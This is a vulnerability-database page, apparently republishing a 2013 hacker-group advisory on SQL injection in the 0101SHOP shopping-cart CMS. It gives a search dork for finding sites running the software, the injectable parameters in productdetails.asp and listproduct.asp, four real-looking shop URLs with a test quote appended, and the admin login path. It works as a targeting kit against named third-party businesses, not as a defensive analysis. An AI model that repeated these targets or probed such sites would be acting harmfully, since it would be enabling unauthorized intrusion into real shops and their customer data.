0101SHOP CMS SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045584 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020118
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
.:: In The Name Of God ::.

####################################################
# 0101SHOP CMS SQL Injection Vulnerability         #
# Security Risk : High                             #
# Discovered By IRaNHaCK Security Team (MR.XpR     #
# Our WebSite : IRaNHaCK.ORG                       #  
# Tested On : XP , 7 , BackTrack                   #
# Date : 2013-02-16                                #
# Version : All                                    #
# Category : WebApp                                # 
####################################################

================================================================
1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." =
                                                               =  
2- Vulnerability(s) :                                          =
                                                               =
Target.Com/productdetails.asp?pcode=[SQL]                      =
Target.Com/listproduct.asp?categorycode=[SQL]                  =
                                                               =
3- Example :                                                   =
http://llsclifestyle.com/listproduct.asp?categorycode=101%27   =
http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27  =
http://shop.honghaico.hk/listproduct.asp?categorycode=1%27     =
http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 =
                                                               =
4- Admin Page :                                                =
Target.Com/adminlogin.asp                                      =
================================================================

**********************************************************************************************
We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp *
Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG            *
**********************************************************************************************

./By MojiRider 
./Persian Gulf For Ever